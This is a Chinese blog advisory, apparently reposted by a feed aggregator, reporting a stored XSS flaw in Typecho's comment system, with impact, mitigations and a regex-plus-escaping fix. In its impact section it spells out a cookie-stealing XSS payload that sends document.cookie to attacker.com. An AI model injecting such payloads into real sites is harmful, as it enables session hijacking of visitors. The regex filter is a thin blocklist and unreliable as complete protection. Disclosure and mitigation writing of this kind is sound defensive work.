惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

腾讯CDC
Schneier on Security
Schneier on Security
B
Blog RSS Feed
aimingoo的专栏
aimingoo的专栏
P
Proofpoint News Feed
A
About on SuperTechFans
Recorded Future
Recorded Future
Recent Announcements
Recent Announcements
Microsoft Security Blog
Microsoft Security Blog
L
LangChain Blog
Hugging Face - Blog
Hugging Face - Blog
The GitHub Blog
The GitHub Blog
Google DeepMind News
Google DeepMind News
T
Tailwind CSS Blog
Vercel News
Vercel News
H
Hackread – Cybersecurity News, Data Breaches, AI and More
MyScale Blog
MyScale Blog
V2EX - 技术
V2EX - 技术
N
Netflix TechBlog - Medium
F
Fortinet All Blogs
V
Visual Studio Blog
Martin Fowler
Martin Fowler
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
博客园 - Franky
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
T
The Exploit Database - CXSecurity.com
F
Full Disclosure
Scott Helme
Scott Helme
H
Heimdal Security Blog
博客园 - 叶小钗
Google DeepMind News
Google DeepMind News
Cyberwarzone
Cyberwarzone
Application and Cybersecurity Blog
Application and Cybersecurity Blog
V
Vulnerabilities – Threatpost
Blog — PlanetScale
Blog — PlanetScale
Security Latest
Security Latest
WordPress大学
WordPress大学
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
T
Troy Hunt's Blog
S
SegmentFault 最新的问题
Forbes - Security
Forbes - Security
Jina AI
Jina AI
S
Securelist
小众软件
小众软件
Simon Willison's Weblog
Simon Willison's Weblog
J
Java Code Geeks
AWS News Blog
AWS News Blog
N
News and Events Feed by Topic
博客园 - 三生石上(FineUI控件)
量子位

小枫网络

紧急预警!React Server Components 及 Next.js 高危远程代码执行漏洞(CVE-2025-55182/CVE-2025-66478) 🔥【站长自用推荐!嘉惟云服务器——性能怪兽+安全堡垒】🔥 🔥【HKGserver服务器】冲就完事了!兄弟们看过来!🔥 知乎服务器崩了, 网页打不开了 jsdelivr npm 国内加速CDN节点 小枫拟态UI5.0Pro - 个人主页源码 小枫公益API - 致力于为开发者提供免费、稳定、快速的Web Api服务 一款优雅简约的鼠标跟踪特效 超好看的HTML+CSS登录页
Typecho 1.21 评论区 XSS 漏洞发现与安全提醒
小枫 · 2025-12-10 · via 小枫网络

近期在对Typecho开源博客程序进行定向安全测试时,发现其评论区存在一处高危存储型XSS漏洞,攻击者可利用该漏洞注入恶意脚本,对站点及访客造成安全威胁。现将漏洞细节、影响范围及修复建议整理分享,旨在协助官方完善防护、提醒站长规避风险。

一、漏洞核心信息

  • 漏洞类型:存储型跨站脚本攻击(XSS)

  • 影响范围:Typecho 1.2.1稳定版(实测版本)及未修复该问题的旧版本、衍生版本

  • 触发模块:Typecho默认评论系统(内容提交与前端渲染模块)

  • 漏洞评级:高危(可批量利用,影响面广,无复杂利用条件)

  • 核心成因:评论区对用户输入的HTML链接内容缺乏严格的安全校验与转义处理,允许恶意构造的事件属性代码被存储并执行

二、漏洞发现与验证过程

本次测试基于“开源程序安全合规测试”原则,在本地搭建了孤立的Typecho测试环境(未接入公网,未关联任何真实数据),针对评论区、留言板等用户输入场景进行定向检测:

  1. 测试思路:聚焦开源程序常见的输入验证缺陷,重点测试HTML标签、特殊属性的过滤机制;

  2. 构造测试 payload:设计包含onfocus「autofocus」等事件属性的链接构造代码

  3. 验证过程:在测试环境评论区提交该 payload 后,系统成功存储并在前端渲染时未做任何过滤/转义,浏览评论页面即触发自动跳转,证实漏洞存在;

  4. 补充测试:更换不同浏览器(Chrome、Firefox、Edge)及Typecho旧版本(1.1、1.2.0),均能成功触发漏洞,说明该问题并非特定版本或环境的偶发缺陷。

三、漏洞利用场景与危害

1. 对普通访客的危害

  • 强制跳转:浏览包含恶意评论的页面时,被自动导向钓鱼网站、恶意软件下载站点;

  • 信息窃取:攻击者可修改 payload 为" onfocus="fetch('https://attacker.com/steal?cookie='+document.cookie)" autofocus="">,窃取访客浏览器Cookie、登录凭证等敏感信息;

  • 会话劫持:利用窃取的Cookie登录访客账号(若站点未启用HTTPS或Cookie未设置Secure/HttpOnly属性);

  • 页面篡改:注入脚本篡改页面展示内容,传播非法信息或诱导访客操作。

2. 对站点所有者的危害

  • 公信力受损:访客遭遇安全问题后,将对站点安全性产生质疑,导致用户流失;

  • 法律风险:若恶意脚本被用于传播违法内容、实施诈骗,站点管理者可能需承担相应连带责任;

  • 服务器风险:大规模恶意评论可能引发前端渲染异常,增加服务器负载,甚至导致站点暂时不可用。

四、应急修复方案

1. 快速配置防护

  • 启用HTML过滤:登录Typecho后台,进入「设置-评论」,勾选“禁止评论中使用HTML标签”,直接阻断HTML类 payload 提交;

  • 关闭匿名评论:仅允许已注册登录用户发表评论,降低恶意提交的概率;

  • 安装安全插件:启用Typecho第三方安全插件(如「SafeGuard」「CommentFilter」),增强输入内容的安全校验。

2. 代码层面修复

修改Typecho评论处理核心文件(路径:var/Widget/Comments/Post.php),在评论内容提交逻辑中增加危险属性过滤:

// 新增过滤规则:移除on*、autofocus等危险属性
$commentContent = preg_replace('/\s+(on\w+|autofocus|javascript:|vbscript:)[\s=]+/i', ' ', $commentContent);
// 对特殊字符进行转义处理
$commentContent = htmlspecialchars($commentContent, ENT_QUOTES | ENT_HTML5);

五、行业倡议

  1. 漏洞反馈进展:已通过国家信息安全漏洞共享平台提交漏洞详情,目前处于等待官方响应阶段,将持续配合后续修复验证工作;

  2. 行业安全倡议:呼吁所有漏洞发现者遵循“负责任披露”原则,发现漏洞后优先向官方反馈,给予合理修复周期,不随意公开未修复漏洞的完整利用方法;同时提醒开源项目团队重视安全测试,建立完善的漏洞响应机制,共同维护开源生态的安全稳定。

  3. Typecho 1.21 评论区 XSS 漏洞发现与安全提醒

 您阅读本篇文章共花了: 


访问者可将本网站提供的内容或服务用于个人学习、研究或欣赏,以及其他非商业性或非盈利性用途,但同时应遵守著作权法及其他相关法律的规定,不得侵犯本网站及相关权利人的合法权利。除此以外,将本网站任何内容或服务用于其他用途时,须征得本网站及相关权利人的书面许可,并支付报酬。